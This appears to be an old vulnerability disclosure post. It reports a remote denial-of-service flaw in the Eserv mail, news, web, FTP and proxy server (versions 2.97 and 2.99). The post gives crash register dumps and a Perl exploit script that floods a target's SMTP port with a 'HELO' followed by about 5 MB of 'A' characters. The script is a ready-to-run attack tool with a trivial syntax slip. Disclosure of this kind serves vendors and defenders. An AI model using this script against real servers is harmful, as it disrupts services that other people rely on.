Eserv remote denial of service

[securma massine <securma () caramail com>]

hi
Eserv is Mail, News, Web, FTP and Proxy Servers for
Win95/98/NT/2000 (http://www.eserv.ru/)
Eserv is vulnerable has an attack back by sending a buffer
of 5M of Data with port 119 or 25 or 110 or 21 with a
buffer of 5080000 byte ,
version tested: v2.97, v2.99 (possible all version are
vulnerable)
one has the following error:
l insructio a "0x0000fde8" emploie l'adresse
memoire "0x0000fde8" la memoire e peut pas etre
"read"
the state of the registers is:
eax=c0000000 ebx=004c3ed5 ecx=0000fde8 edx=002f0608
esi=004fc17e edi=003bb358
eip=0000fde8 esp=0189efa4 ebp=0189ff54 iopl=0 nv up
ei pl nz ac pe nc
cs=001b ss=0023 ds=0023 es=0023 fs=0038
gs=0000 efl=00000212
0000fde8 ?? ???
while adding a few bytes to the buffer the programe falls
without any message
exploit:
#!/usr/bin/perl -w
#greetz: marocit
#tool Eserv_dos.pl
use IO::Socket;
$buffer = "A"x 5080000 ;
$hel = "HELO "
$connect = IO::Socket::INET ->new (Proto=>"tcp",
PeerAddr=> "$ARGV[0]",
PeerPort=>"25"); unless ($connect) { die "cant connect $ARGV
[0]" }
print $connect "$hel$buffer";
print "\nsending exploit......\n\n";

securma massine
_________________________________________________________
Gagne une PS2 ! Envoie un SMS avec le code PS au 61166
(0,35€ Hors coût du SMS)